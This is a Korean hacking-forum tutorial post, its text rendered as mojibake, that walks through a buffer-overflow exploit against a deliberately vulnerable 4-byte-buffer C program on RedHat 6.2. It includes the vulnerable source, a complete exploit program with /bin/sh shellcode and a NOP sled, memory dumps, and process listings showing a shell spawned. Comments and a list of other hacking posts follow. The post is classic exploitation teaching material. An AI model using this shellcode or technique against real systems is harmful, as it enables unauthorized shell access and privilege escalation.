1580, 8/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   buff3r
   http://#include .
   [ÀÚÀÛ]RedHat 6.2 ȯ°æ¿¡¼­ BOF exploit ¸¸µé±â -The Second -

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1438 [º¹»ç]


Àú¹ø¿¡ ¸¸µé¾ú´ø ÀͽºÇ÷ÎÀÕÀº Ãë¾àÇÑ ÇÁ·Î±×·¥ ³»ºÎ ¹öÆ۾ȿ¡¼­
¸ðµçÀÏÀ» ³¡³Â½À´Ï´Ù. À̹ø¿¡´Â buf ¿¡ 4¹ÙÀÌÆ® ¸¸À» ÇÒ´çÇÏ´Â ÇÁ·Î±×·¥À» ÀͽºÇ÷ÎÀÕ
Çغ¸µµ·Ï ÇÏ°Ú½À´Ï´Ù
vuln.c
#include <stdio.h>
#include "dumpcode.h"
int main(int argc,char *argv[])
{
        char buf[4];  // 4¹ÙÀÌÆ®¸¸À» ÇÒ´çÇÕ´Ï´Ù.
                                 // STACK ±¸Á¶ [buf(4)][sfp(4)[ret(4)]
                                 // ¿ì¸®°¡ ÀÌ¿ëÇÒ¼ö Àִ°ø°£Àº 8Byte ÀÔ´Ï´Ù.
                                 // Àú¹ø°ú °°Àº ¹æ¹ýÀ¸·Î´Â ÀͽºÇ÷ÎÀÕÀÌ ºÒ°¡´ÉÇÕ´Ï´Ù.
        strcpy(buf,argv[1]);
        dumpcode(buf,500);
}

±×·¸´Ù¸é ¾î¶»°Ô °ø°ÝÀ» ¼º°ø½ÃÄÑ¾ß ÇÒ±î¿ä . ? ¹æ¹ýÀº µÎ°¡Áö°¡ ÀÖ½À´Ï´Ù.
1. ȯ°æº¯¼ö¸¦ ÀÌ¿ëÇÑ exploit
2. NOP À» ÀÌ¿ëÇÑ exploit
(RTL Àº ÀÏ´Ü »¯½À´Ï´Ù .. ¤»¤»)
À̹ø °­Á¿¡¼­´Â 2¹ø° ¹æ¹ýÀ» ÀÌ¿ëÇÏ°Ú½À´Ï´Ù.
8¹ÙÀÌÆ® ¹Û¿¡ ¾ø´Âµ¥ ¾î¶»°Ô NOPÀ» ³Ö³Ä±¸¿ä ??
¹æ¹ýÀº °£´ÜÇÕ´Ï´Ù. ret µÚ¿¡ NOP °ú ½©Äڵ带 ³Ö¾îÁØÈÄ, ret´Â NOPÁß ¾Æ¹«°÷À̳ª
°¡¸£Å°°Ô ÇϸéµË´Ï´Ù.
°ø°ÝÇÒ ½ºÅñ¸Á¶:
[¾²·¹±â°ª ( 8Byte ) ][ RET ( 8Bye ] [ NOP x 200 ( 200byte) ] [Shellcode ]
                            --------------               ¡è
                                    ¡é                      ¡è
                                    ¡æ¡æ¡æ¡æ¡æ¡æ¡æ¡æ¡æ¡æ

ÀÌ·±½ÄÀ¸·Î ±¸¼ºÇÏ¸é µË´Ï´Ù.
ÀÏ´Ü ret µÚ¿¡ NOPÀÌ PUSH µÉ ÁÖ¼Ò¸¦ ã¾Æº¾½Ã´Ù.
[test@localhost test]$ ./vuln `perl -e 'print "\x90"x600'`
0xbffff904  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff914  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff924  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff934  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff944  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff954  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff964  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff974  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff984  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff994  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9a4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9b4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9c4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9d4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9e4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9f4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa04  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa14  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa24  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa34  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa44  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa54  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa64  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa74  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa84  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa94  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffaa4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffab4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffac4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffad4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffae4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffaf4  90 90 90 90                    

°ø°£ÀÌ Âü ¹«±Ã¹«Áø Çϱº¿ä +-+
¿ì¸®´Â 0xbffff924 ¸¦ ÀÌ¿ëÇսô٠.
ex.c
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68"; // This Is Shellcode
int main(int argc, char *argv[])
{
        int i, offset;
        long esp, ret, *addr_ptr;
        char *buffer, *ptr;
        ret = 0xbffff924;  // ¿ì¸®°¡ ÀÌ¿ëÇÒ RET °ª
        buffer = malloc(600);
        ptr = buffer;
        addr_ptr = (long *) ptr;
        for(i=0; i < 600; i+=4)
        { *(addr_ptr++) = ret; }  // ¸ðµç 600 byte¸¦ ret·Î µ¤¾î¾´´Ù
        for(i=0; i < 8; i++)
        { buffer[i] = '\x41'; } // óÀ½ 8 ¹ÙÀÌÆ®¸¦ \x41 (A) ·Î µ¤¾î¾´´Ù.
        ptr = buffer + 12; // ½ºÅà ¸ð½ÀÀÌ [A x 8 (8byte)][RET ( 4byte)] À̹ǷÎ
                                 // NOPÀº ret µÚÀÎ buffer + 12 ºÎÅÍ µ¤¾î¾´´Ù.
        for(i=0; i < 200; i++)
        { *(ptr++) = '\x90'; }   // NOP µ¤¾î¾²±â
        ptr = buffer + 212; // ½©Äڵ尡 À§Ä¡ÇÒ ºÎºÐ
        for(i=0; i < strlen(shellcode); i++)
        { *(ptr++) = shellcode[i]; }   // RET , NOP µÚ¿¡ ½©Äڵ带 µ¤¾î¾´´Ù.

        buffer[600-1] = 0;        
        execl("./vuln", "vuln", buffer, 0);                      // ½ÇÇà
        free(buffer);
        return 0;
}
°ø°ÝÇϱâÀü :
[test@localhost test]$ ps
  PID TTY          TIME CMD
  681 pts/0    00:00:00 bash
  732 pts/0    00:00:00 bash2
  741 pts/0    00:00:00 ps

°ø°Ý :
[test@localhost test]$ ./ex
0xbffff8d4  41 41 41 41 41 41 41 41 24 f9 ff bf 90 90 90 90   AAAAAAAA$.......
0xbffff8e4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff8f4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff904  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff914  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff924  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff934  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff944  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff954  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff964  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff974  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff984  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff994  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9a4  90 90 90 90 31 c0 b0 46 31 db 31 c9 cd 80 eb 16   ....1..F1.1.....
0xbffff9b4  5b 31 c0 88 43 07 89 5b 08 89 43 0c b0 0b 8d 4b   [1..C..[..C....K
0xbffff9c4  08 8d 53 0c cd 80 e8 e5 ff ff ff 2f 62 69 6e 2f   ..S......../bin/
0xbffff9d4  73 68 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   sh..$...$...$...
0xbffff9e4  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffff9f4  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa04  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa14  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa24  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa34  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa44  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa54  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa64  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa74  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa84  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa94  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffaa4  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffab4  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffac4  24 f9 ff bf                                       $...
bash$
°ø°Ý ÇÏ°í³­ ÈÄ :
bash$ ps
  PID TTY          TIME CMD
  681 pts/0    00:00:00 bash
  732 pts/0    00:00:00 bash2
  739 pts/0    00:00:00 sh // °ø°ÝÀÌ ¼º°øÇߴٴ°ÍÀ» ¾Ë¼öÀÖ´Ù
  740 pts/0    00:00:00 ps
  Hit : 7013     Date : 2010/03/18 06:55


    
º°ºûÀ»´ã¾Æ ¿©·¯ºÐÀº Áö±Ý buff3r°¡ ¹öÆÛ¸¦ °¡Áö°í ³î°í ÀÖ´Â ±¤°æÀ» º¸°í °è½Ê´Ï´Ù.

¿©Æ° ¼±´ñ±Û ÈÄ°¨»ó		 2010/03/18  
ÃÊÄÝ·¿³ªÀÎ ¹öÆÛ°¡ ¹öÆÛ¸¦ °¡Áö°í ³î°íÀÖ´Â ±¤°æ¤»¤»¤» 2010/03/18  
kjwon15 NOP À» °¡Áö°í ³ë´Â ±¤°æÀ̱º¿ä.. 2010/03/23  
zzguswhd ¾î¶².. ÄÄÆÄÀÏ·¯¸¦ ¾´°Å¿¡¿ä ?; 2010/07/26  
Cpgroot ÁÁÀºÁ¤º¸ µè°í°¨ ..¤·¤µ¤· 2010/08/18  
1440   letmein ´Ô ÇØÄ· Àü±îÁö Ç®¸é µÈ´Ù°í Çß´ø ¹®Á¦¿ä     blueh4g
 02/03 6426
1439   ÇØÅ·¹æ¹ý[12]     bongcheur
 07/07 12761
1438   ÄÄÇ»ÅÍÇØÄ¿[4]     bongcheur
 07/07 8979
1437   Windows NetBios ¸¦ ¾Ç¿ëÇÑ ÇØÅ·¹æ¹ýÀÇ ¿¹¿Í ´ëó¹æ¹ý[3]     bongcheur
 07/07 10282
1436   Å°º¸µåÇØÅ·(º¸¾È)¿¡ ´ëÇØ     bongcheur
 07/07 7035
1435   nProtect Å°º¸µå ÇØÅ·¹æÁö ÇÁ·Î±×·¥ ¼³Ä¡[5]     bongcheur
 07/07 9891
1434   ÇØÅ·Åø[5]     bongcheur
 07/08 10017
1433   ¿ø°ÝÁ¾·á....[39]     bsjzzz
 01/02 11343
1432   ¸®´ª½º ¹æÈ­º®ÀÇ Á¾·ù...[4]     bsjzzz
 01/12 13413
1431   Á¦°¡ Á÷Á¢ ÀÛ¼ºÇÑ Sql Injection ¹®¼­ÀÔ´Ï´Ù .[9]     buff3r
 10/29 7548
1430   [ÀÚÀÛ]°£´ÜÈ÷ NetcatÀ» ÀÌ¿ëÇÏ¿© À©µµ¿ìXP °®°í³î±â[11]     buff3r
 01/03 7521
1429   Start of SQL Injection (¸Å¿ì ±âÃÊ) 1[6]     buff3r
 01/11 7008
1428   Ready to Make a Sql injection tool[5]     buff3r
 01/15 7060
1427   [BASE]Making SQL injection tool 1/3[3]     buff3r
 01/20 6362
1426   [BT4_han.iso]USBºÎÆÃÇÏ´Â ¹æ¹ý For º°ºûÀ»´ã¾Æ[5]     buff3r
 02/22 9479
1425   [ÀÚÀÛ] M4k3 Xploits :D[2]     buff3r
 03/06 6338
1424   [ÀÚÀÛ]RedHat 6.2 ȯ°æ¿¡¼­ BOF exploit ¸¸µé±â[6]     buff3r
 03/17 12616
  [ÀÚÀÛ]RedHat 6.2 ȯ°æ¿¡¼­ BOF exploit ¸¸µé±â -The Second -[5]     buff3r
 03/18 7012
1422   Fedora Core 3 local based buffer overflow[3]     buff3r
 08/22 6908
1421   ;cat À» »ç¿ëÇÏ´Â ÀÌÀ¯ .[3]     bugfixer2
 05/18 9901
[1][2][3][4][5][6][7] 8 [9][10]..[79]

Copyright 1999-2023 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org & Wowhacker.com